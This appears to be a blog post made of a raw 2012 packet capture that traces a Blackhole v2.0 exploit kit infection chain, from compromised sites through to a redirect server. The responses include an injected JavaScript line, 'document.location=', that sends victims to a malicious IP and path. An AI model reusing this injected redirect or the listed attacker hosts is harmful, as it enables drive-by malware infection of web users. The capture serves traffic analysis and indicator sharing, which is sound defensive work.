Blackhole v2.0 Exploit Kit Vector Java uses injected link and java applet

By | June 19, 2015

2012-09-18 22:41:41.081678 IP 192.168.106.131.1325 > 192.168.106.2.53: 35602+ A? arksylhet[.]com. (31)
E..;)………j…j..-.5.’.`………… arksylhet[.]com…..
2012-09-18 22:41:41.212429 IP 192.168.106.2.53 > 192.168.106.131.1325: 35602 1/0/0 A 216.246.98.78 (47)
E..K_……3..j…j..5.-.7………….. arksylhet[.]com……………….bN
2012-09-18 22:41:41.214138 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [S], seq 56424381, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0).@…jk..j…bN…P.\……p… ………..
2012-09-18 22:41:41.417038 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [S.], seq 816984929, ack 56424382, win 64240, options [mss 1460], length 0
E..,_…..t…bN..j..P..0.3a.\..`………..
2012-09-18 22:41:41.417133 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [.], ack 1, win 64240, length 0
E..().@…jr..j…bN…P.\..0.3bP….r..
2012-09-18 22:41:41.418016 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 1:389, ack 1, win 64240, length 388
E…).@…h…j…bN…P.\..0.3bP….8..GET /A67iD4eo/index.html HTTP/1.1
Host: arksylhet[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

2012-09-18 22:41:41.418106 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [.], ack 389, win 64240, length 0
E..(_…..t…bN..j..P..0.3b.\.BP…….
2012-09-18 22:41:41.644235 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [P.], seq 1:509, ack 389, win 64240, length 508
E..$_…..r…bN..j..P..0.3b.\.BP…….HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:53 GMT
Server: Apache
Last-Modified: Tue, 18 Sep 2012 15:53:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

………….
.0.E……2H……B……&5.!.._ol….=p…*..6…..rs.wE.,s
!…….^..&……….i.”…..7>.$F’……xw..W…..Q.qi!….\.. i0a….~P..i…V.,#.z2:..@H%.8.K\……1(e……6_…m.3B….v5.V…
2012-09-18 22:41:41.657446 IP 192.168.106.131.1325 > 192.168.106.2.53: 18706+ A? ankaradellservisi[.]com. (39)
E..C)………j…j..-.5./..I…………ankaradellservisi[.]com…..
2012-09-18 22:41:41.744240 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [P.], seq 1:509, ack 389, win 64240, length 508
E..$_…..r…bN..j..P..0.3b.\.BP…….HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:53 GMT
Server: Apache
Last-Modified: Tue, 18 Sep 2012 15:53:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
2012-09-18 22:41:41.752613 IP 192.168.106.131.1079 > 192.168.106.2.53: 45075+ A? web63.server77.publicompserver[.]de. (51)
E..O*………j…j..7.5.;……………web63.server77.publicompserver[.]de…..
2012-09-18 22:41:41.762668 IP 192.168.106.131.1076 > 192.168.106.2.53: 17427+ A? classerental[.]com. (34)
E..>*………j…j..4.5.*.VD…………classerental[.]com…..
2012-09-18 22:41:41.765791 IP 192.168.106.2.53 > 192.168.106.131.1325: 18706 1/0/0 A 89.106.12.145 (55)
E..S_……&..j…j..5.-.?..I…………ankaradellservisi[.]com……………..Yj..
2012-09-18 22:41:41.766452 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [S], seq 2647479993, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0*.@…?…j.Yj…..P..V…..p……………
2012-09-18 22:41:41.884803 IP 192.168.106.2.53 > 192.168.106.131.1079: 45075 1/0/0 A 92.43.108.70 (67)
E..__………j…j..5.7.K……………web63.server77.publicompserver[.]de……………..\+lF
2012-09-18 22:41:41.886388 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [S], seq 928996080, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0* @….!..j.\+lF…P7_Z…..p….n……….
2012-09-18 22:41:41.888357 IP 192.168.106.2.53 > 192.168.106.131.1076: 17427 1/0/0 A 174.121.152.5 (50)
E..N_……)..j…j..5.4.:q.D…………classerental[.]com………………y..
2012-09-18 22:41:41.888845 IP 192.168.106.131.1412 > 174.121.152.5.80: Flags [S], seq 528402302, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0*.@…_…j..y…..P.~.~….p…)………..
2012-09-18 22:41:41.914944 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [S.], seq 2045726438, ack 2647479994, win 64240, options [mss 1460], length 0
E..,_…..J.Yj….j..P..y.N…V.`…H…….
2012-09-18 22:41:41.915045 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [.], ack 1, win 64240, length 0
E..(*.@…?…j.Yj…..P..V.y.N.P…`…
2012-09-18 22:41:41.915330 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [P.], seq 1:383, ack 1, win 64240, length 382
E…*.@…>…j.Yj…..P..V.y.N.P…….GET /78gcm6uH/js.js HTTP/1.1
Host: ankaradellservisi[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:41.915419 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [.], ack 383, win 64240, length 0
E..(_…..J.Yj….j..P..y.N…X8P…_…
2012-09-18 22:41:42.000482 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [S.], seq 1489918110, ack 928996081, win 64240, options [mss 1460], length 0
E..,_…….\+lF..j..P..X.X.7_Z.`…_…….
2012-09-18 22:41:42.000671 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [.], ack 1, win 64240, length 0
E..(*.@….#..j.\+lF…P7_Z.X.X.P…w…
2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
E…*.@…….j.\+lF…P7_Z.X.X.P….?..GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver[.]de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:42.001159 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [.], ack 395, win 64240, length 0
E..(_…….\+lF..j..P..X.X.7_\{P…v+..
2012-09-18 22:41:42.067301 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [P.], seq 1:338, ack 383, win 64240, length 337
E..y_…..H.Yj….j..P..y.N…X8P…uW..HTTP/1.1 200 OK
Content-Length: 71
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Sep 2012 15:27:56 GMT
Accept-Ranges: bytes
ETag: “56c7ca2db295cd1:143d0e”
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Sep 2012 01:39:40 GMT

document.location=’hxxp://69.194.193.34/links/systems-links_warns.php’;

2012-09-18 22:41:42.074803 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 389:739, ack 509, win 63732, length 350
E…*.@…h…j…bN…P.\.B0.5^P….p..GET /favicon.ico HTTP/1.1
Host: arksylhet[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

2012-09-18 22:41:42.074927 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [.], ack 739, win 64240, length 0
E..(_…..t…bN..j..P..0.5^.\..P…….
2012-09-18 22:41:42.075596 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [S], seq 2894491348, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0* @…….j.E..”…P..n…..p…4………..
2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472
E…_…….\+lF..j..P..X.X.7_\|P…D…HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 19 Sep 2012 02:31:59 GMT
ETag: “894002-47-4ca04cfa1a5c0”
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

document.location=’hxxp://69.194.193.34/links/systems-links_warns.php’;
2012-09-18 22:41:42.119620 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [R.], seq 396, ack 473, win 0, length 0
E..(*”@…….j.\+lF…P7_\|X.ZwP…o?..
2012-09-18 22:41:42.121447 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iy.y….j..P…….~..`………..
2012-09-18 22:41:42.167256 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [P.], seq 1:338, ack 383, win 64240, length 337
E..y_…..H.Yj….j..P..y.N…X8P…uW..HTTP/1.1 200 OK
Content-Length: 71
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Sep 2012 15:27:56 GMT
Accept-Ranges: bytes
ETag: “56c7ca2db295cd1:143d0e”
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Sep 2012 01:39:40 GMT

document.location=’hxxp://69.194.193.34/links/systems-links_warns.php’;
2012-09-18 22:41:42.167362 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [.], ack 338, win 63903, length 0
E..(*#@…?…j.Yj…..P..X8y.P8P…_…
2012-09-18 22:41:42.221243 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iw.y….j..P…….~..`………..
2012-09-18 22:41:42.258484 IP 69.194.193.34.80 > 192.168.106.131.1413: Flags [S.], seq 1477912213, ack 2894491349, win 64240, options [mss 1460], length 0
E..,_…….E..”..j..P..X.&…n.`….7……
2012-09-18 22:41:42.258663 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [.], ack 1, win 64240, length 0
E..(*$@…….j.E..”…P..n.X.&.P…….
2012-09-18 22:41:42.260280 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [P.], seq 1:450, ack 1, win 64240, length 449
E…*%@…….j.E..”…P..n.X.&.P…….GET /links/systems-links_warns.php HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html
2012-09-18 22:41:43.033150 IP 69.194.193.34.80 > 192.168.106.131.1413: Flags [.], seq 1:1461, ack 450, win 64240, length 1460
E…_……TE..”..j..P..X.&…p.P…7B..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:41:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.14-1~dotdeb.0

510
69.194.193.34.80: Flags [R.], seq 264, ack 1461, win 0, length 0

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *